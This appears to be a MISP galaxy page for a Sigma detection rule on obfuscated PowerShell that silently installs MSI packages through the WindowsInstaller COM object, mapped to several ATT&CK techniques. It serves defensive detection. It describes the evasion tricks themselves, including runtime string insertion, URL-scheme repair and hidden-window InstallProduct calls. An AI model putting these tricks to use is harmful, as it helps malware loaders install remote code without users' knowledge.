Skip to content

Hide Navigation Hide TOC

Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c)

Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of InstallProduct and COM object creation, particularly combined with hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.

Cluster A Galaxy A Cluster B Galaxy B Level
Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c) Sigma-Rules Command Obfuscation - T1027.010 (d511a6f6-4a33-41d5-bc95-c343875d1377) Attack Pattern 1
Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c) Sigma-Rules PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) Attack Pattern 1
Obfuscated PowerShell MSI Install via WindowsInstaller COM (7b6a7418-3afc-11f0-aff4-000d3abf478c) Sigma-Rules Msiexec - T1218.007 (365be77f-fc0e-42ee-bac8-4faf806d9336) Attack Pattern 1
Command Obfuscation - T1027.010 (d511a6f6-4a33-41d5-bc95-c343875d1377) Attack Pattern Obfuscated Files or Information - T1027 (b3d682b6-98f2-4fb0-aa3b-b4df007ca70a) Attack Pattern 2
Command and Scripting Interpreter - T1059 (7385dfaf-6886-4229-9ecd-6fd678040830) Attack Pattern PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) Attack Pattern 2
System Binary Proxy Execution - T1218 (457c7820-d331-465a-915e-42f85500ccc4) Attack Pattern Msiexec - T1218.007 (365be77f-fc0e-42ee-bac8-4faf806d9336) Attack Pattern 2